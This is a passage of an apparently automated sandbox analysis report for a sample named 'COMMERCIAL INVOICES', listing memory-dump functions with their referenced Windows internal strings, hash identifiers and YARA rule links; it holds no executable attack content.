                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A511971E1125EAFDB11EFA9CC84AEEBBFCEB54754F100529E611E7290D6309905CB60
                                                                                                                                                                                                                                      Function 012404E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0124063D
                                                                                                                                                                                                                                      • kLsE, xrefs: 01240540
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                                                      • API String ID: 0-2547482624
                                                                                                                                                                                                                                      • Opcode ID: 4e44b5cd6f5f2560782c872a5003b38ecbe6dd93af54ec67ac730961946b861b
                                                                                                                                                                                                                                      • Instruction ID: 78b1b00ab3f6ca248cf43e74571a0a0938c7b0d1ab430e89ea6b267d882559b9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e44b5cd6f5f2560782c872a5003b38ecbe6dd93af54ec67ac730961946b861b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2851AE715247429FD729EF68C4406E7BBE8AF84304F10483EFB9A87241E770D585CB9A
                                                                                                                                                                                                                                      Function 0124A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 0124A309
                                                                                                                                                                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 0124A2FB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                                                                      • API String ID: 0-2876891731
                                                                                                                                                                                                                                      • Opcode ID: b63a8c1fae956ed36d367210e11c91e1e62b6b33c4de21dbe4db25a67135de99
                                                                                                                                                                                                                                      • Instruction ID: 5b646b6262e1a7ce4f547697a854a48020f9397933c3681b70de96e743231055
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b63a8c1fae956ed36d367210e11c91e1e62b6b33c4de21dbe4db25a67135de99
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A419031A64646DBDB29CF59C440B69BBB4FF85700F2444A9EA02DB291F3B5D940CB50
                                                                                                                                                                                                                                      Function 0127A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                                                                      • API String ID: 2994545307-4008356553
                                                                                                                                                                                                                                      • Opcode ID: 05ff2a1bb571943ad6bd2f1162a419921fd8fb76936d3a62a2231362fa340f5a
                                                                                                                                                                                                                                      • Instruction ID: 38e6fa834fcc57494ec03772c2f0612565892392275fbf4bbde4bd8e342a76f8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05ff2a1bb571943ad6bd2f1162a419921fd8fb76936d3a62a2231362fa340f5a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD01F4B2260700AFD311DF14CD46F2A77E8E795725F048979A648C7194E374D904CB4A
                                                                                                                                                                                                                                      Function 0124C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: MUI
                                                                                                                                                                                                                                      • API String ID: 0-1339004836
                                                                                                                                                                                                                                      • Opcode ID: 20805219770c1f0c2f627c63e6b31ef3922c496ce9395fae710c8a79cc22c85b
                                                                                                                                                                                                                                      • Instruction ID: 88a8ba67f707688b950a2e017e72671fe4e52edac1c1eb73caa909b8aff58e53
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20805219770c1f0c2f627c63e6b31ef3922c496ce9395fae710c8a79cc22c85b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF827B75E212198BEB29CFADC880BEDBBB1FF58310F14816ADA19AB351D7709941CF50
                                                                                                                                                                                                                                      Function 012C6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                                                                                                                      • Opcode ID: dbb61ff2119ffa3908318a4347e672f0a7b515fe97db3f6d5b1081ba19e12fff
                                                                                                                                                                                                                                      • Instruction ID: 5037aa3d140db600a2172030b944647705b3cce5f924758d2e3eb396e60ce146
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbb61ff2119ffa3908318a4347e672f0a7b515fe97db3f6d5b1081ba19e12fff
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0591627195021AAFEB21DF95CC85FAEBBB8EF14B50F200159F701AB291D774AD40CBA0
                                                                                                                                                                                                                                      Function 012EE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 74223d82f93c93d31690272db7d3625885e0df61dc28da2b886c9cc5ba978eb9
                                                                                                                                                                                                                                      • Instruction ID: 413d1b0a56417dcb5e9073191b4e56b86a0c2e8ca21642491b3dc9bc7c69e352
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74223d82f93c93d31690272db7d3625885e0df61dc28da2b886c9cc5ba978eb9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E191B03192164AAFDB22AFA4DC88FFFBBB9EF55740F550025F600A7250EB749941CB90
                                                                                                                                                                                                                                      Function 0127A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: GlobalTags
                                                                                                                                                                                                                                      • API String ID: 0-1106856819
                                                                                                                                                                                                                                      • Opcode ID: f7c761f1b9c7353e7ab9d21d2956cbe2f5a82b85ce20695030739e08be3556bf
                                                                                                                                                                                                                                      • Instruction ID: 1a1d83ced15839b2c92555a9b7afcd7f4152f9d05b9489da748fced4023f8ade
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7c761f1b9c7353e7ab9d21d2956cbe2f5a82b85ce20695030739e08be3556bf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E717DB5E2020A9FDF28CF9CC5916EDBBB2FF48790F14812EEA05A7241E7719945CB50
                                                                                                                                                                                                                                      Function 012E4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: .mui
                                                                                                                                                                                                                                      • API String ID: 0-1199573805
                                                                                                                                                                                                                                      • Opcode ID: 90611ac34bf6383f5c8a18abebb36ccb23975e35ed9422881dc331e9eb98bab2
                                                                                                                                                                                                                                      • Instruction ID: faab8a0bd9caac1ec899d7a4c5188aad52ca96488d96b8372fc2ef197d1a9067
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90611ac34bf6383f5c8a18abebb36ccb23975e35ed9422881dc331e9eb98bab2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0351B2B2D2026A9BDF14EF99D848AAEBBF4AF54610F45412DEA11FB340D3749C01CBE4
                                                                                                                                                                                                                                      Function 0125E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: EXT-
                                                                                                                                                                                                                                      • API String ID: 0-1948896318
                                                                                                                                                                                                                                      • Opcode ID: 6f46c576d9374647672a9c1e1f516cf904997ed03c324d60c8af63c77d475c1e
                                                                                                                                                                                                                                      • Instruction ID: 601c5cacf319fbf8272568415a483fcf3762ad8c29fcca2c5d32acfa80432eac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f46c576d9374647672a9c1e1f516cf904997ed03c324d60c8af63c77d475c1e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5941B1725283029BD754DB75C8C0B6BFBE8AF98714F45092DFE84E7180E674DA04C7A6
                                                                                                                                                                                                                                      Function 012BC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: BinaryHash
                                                                                                                                                                                                                                      • API String ID: 0-2202222882
                                                                                                                                                                                                                                      • Opcode ID: d1d3dda163e6e456f461fccc14822746fe171b918f725f4ac1896867c7c46b54
                                                                                                                                                                                                                                      • Instruction ID: 507a77d709ae3bd6ce8b73e1fae12d8e1219d6bfda94f790b0d8efd6a0f78a1e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1d3dda163e6e456f461fccc14822746fe171b918f725f4ac1896867c7c46b54
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F4153B1D1112DABDF21DA50CC84FEEB77CAB44754F0045A5EB08AB140EB709E99CFA4
                                                                                                                                                                                                                                      Function 012D6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: #
                                                                                                                                                                                                                                      • API String ID: 0-1885708031
                                                                                                                                                                                                                                      • Opcode ID: 23e3405f6bf1e04a2355c9561874a4de3f44ee6f01fd33cb67328d23565f4bb6
                                                                                                                                                                                                                                      • Instruction ID: a4a3914e016f063b36b63868e5b85c574dbdef5ebad854294fa5f90210ec7ba3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23e3405f6bf1e04a2355c9561874a4de3f44ee6f01fd33cb67328d23565f4bb6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61312D31A2075A9BEB32DF69C854BEE7BB8DF04704F544028EA41AB282D775E805CB54
                                                                                                                                                                                                                                      Function 012BCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: BinaryName
                                                                                                                                                                                                                                      • API String ID: 0-215506332
                                                                                                                                                                                                                                      • Opcode ID: 2ff6bf62621106b7e8b10988d6ed7420ef4a9eeed8851d551768f3484dd971bc
                                                                                                                                                                                                                                      • Instruction ID: a34509d9c799ecb7ec91d4529b24315e7243ff4c33656f52657e45b2c32a7dd5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff6bf62621106b7e8b10988d6ed7420ef4a9eeed8851d551768f3484dd971bc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A313936921516EFEB15DB58C891EBFBB74EF807A0F014129EA01A7250E7309E10DBE0
                                                                                                                                                                                                                                      Function 012C892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 012C895E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                                                                      • API String ID: 0-702105204
                                                                                                                                                                                                                                      • Opcode ID: d8d6a27c572c77ce1cf0b9943a9f7e46df1e3ff0fd49d211a44b2e859ddef442
                                                                                                                                                                                                                                      • Instruction ID: d813e14f81a24acce34d8ce0ac6eec217d889a84380896c1d461f8c5f0308351
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8d6a27c572c77ce1cf0b9943a9f7e46df1e3ff0fd49d211a44b2e859ddef442
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C301F7312702069BE6246F598885BEA7B65EFC5B55F04021CF74156661CB60A880C79A
                                                                                                                                                                                                                                      Function 012E2000 Relevance: .8, Instructions: 757COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 88ce91fb1e09d7bea558eeac6e9f61840758f542dcb714b06f74b0de4b13d232
                                                                                                                                                                                                                                      • Instruction ID: 00e62a2a9853839ee16e5b22d82950c21026df022492fd6b2abe55f2d50447d3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88ce91fb1e09d7bea558eeac6e9f61840758f542dcb714b06f74b0de4b13d232
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5542B471628342CBD725CF68C895A6BBBE9FF98300F88092DFA8797250D770D945CB52
                                                                                                                                                                                                                                      Function 012D8158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: dd567fb2bb297b38ff7dc1b9e98fdaf6e025a203bc717004af62d2da2f4afaf7
                                                                                                                                                                                                                                      • Instruction ID: cf23ae350b6fca13ea517bce71e1335160c63561fdee9bf1a26f1124c76f4f15
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd567fb2bb297b38ff7dc1b9e98fdaf6e025a203bc717004af62d2da2f4afaf7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C425D75E202198FEB25CF69C881BADBBF5FF48310F158099EA49EB241DB349985CF50
                                                                                                                                                                                                                                      Function 01252840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c54c41fc2661583ab30d0d7e6b1d1c5805313dee7ea4b751f9bf5a94e03a321e
                                                                                                                                                                                                                                      • Instruction ID: 6d0fdba693745188d34d4007845fa3c999eb7f1ca2d274142def71633a578c25
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c54c41fc2661583ab30d0d7e6b1d1c5805313dee7ea4b751f9bf5a94e03a321e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4320C70A20746CFEB25CF69C8447BEBBF6BF84700F68411DDA869B284D775A806CB50
                                                                                                                                                                                                                                      Function 012EA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a3001bb7e49ef8ce8842e67343d2302ab5797f707d3402b1e1ec42bc37256bdf
                                                                                                                                                                                                                                      • Instruction ID: 99a395d61afc6d3277ed821a0cce8da577d0c9dc676bdc5770875bc169b95836
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3001bb7e49ef8ce8842e67343d2302ab5797f707d3402b1e1ec42bc37256bdf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC22D2746346628FEB25CF2DC099376BBF1EF45300F888499EA968F286D375D452CB60
                                                                                                                                                                                                                                      Function 01246A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2d862d8aef747bc50647afea6aabb0572123784e05e285fdca2d0397e1041560
                                                                                                                                                                                                                                      • Instruction ID: d13cbcab0f68c3e76f747898b6d1b4be61271057f2d7beafc8908fac22352039
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d862d8aef747bc50647afea6aabb0572123784e05e285fdca2d0397e1041560
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1432CF71A21216CFDB29CF68C480BAEBBF1FF49310F148569EA56AB391D770E851CB50
                                                                                                                                                                                                                                      Function 01264A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                                                                      • Instruction ID: 8c1edf18cf342dfe11510fb3270083f17a5cef565fa99c8270c77dff9e6df152
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7F18271E2024A9FDB15DF99D580BAEBBF9BF48714F048129EA41AB384E774D881CB50
                                                                                                                                                                                                                                      Function 012D892B Relevance: .4, Instructions: 386COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4489d195134b33d64f205d4cd52c46463bdb0a7f301e2a0fbf92665682811fd1
                                                                                                                                                                                                                                      • Instruction ID: e4f0379168201dc187b13f90b978cc6e5e21f56d2da92f488442c90b885d6b2d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4489d195134b33d64f205d4cd52c46463bdb0a7f301e2a0fbf92665682811fd1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96D10272A2060A8BDF09CF69C841BFEB7F1BF88304F198169D955E7281E735E905CB60
                                                                                                                                                                                                                                      Function 012465D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 63b4ef4ba9b5c5d1adaf4fdda8ee1393352b169b379ad7c7893a90b2166263ed
                                                                                                                                                                                                                                      • Instruction ID: d501fb909e8b63782fd15b897970269f592db6277e801195045995599e7b5efc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63b4ef4ba9b5c5d1adaf4fdda8ee1393352b169b379ad7c7893a90b2166263ed
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBE1A175518342CFC719CF28C090A6ABBF1FF8A314F058A6DE99587351D771E909CB92
                                                                                                                                                                                                                                      Function 01238397 Relevance: .4, Instructions: 380COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 37eb3420391e27ab177abe0a6c76249d2d4eecaa962a4886d959c2d3ce3a280c
                                                                                                                                                                                                                                      • Instruction ID: e8e451fbbe379ff2db89c83b1cdd893d116ea8dc0a8a1593ef8b1e89a9257178
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37eb3420391e27ab177abe0a6c76249d2d4eecaa962a4886d959c2d3ce3a280c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6D1C1B1A202069BDF19DF68D881EBA77B5BF94304F05422DFA15DF280E730E950CB90
                                                                                                                                                                                                                                      Function 012C8243 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
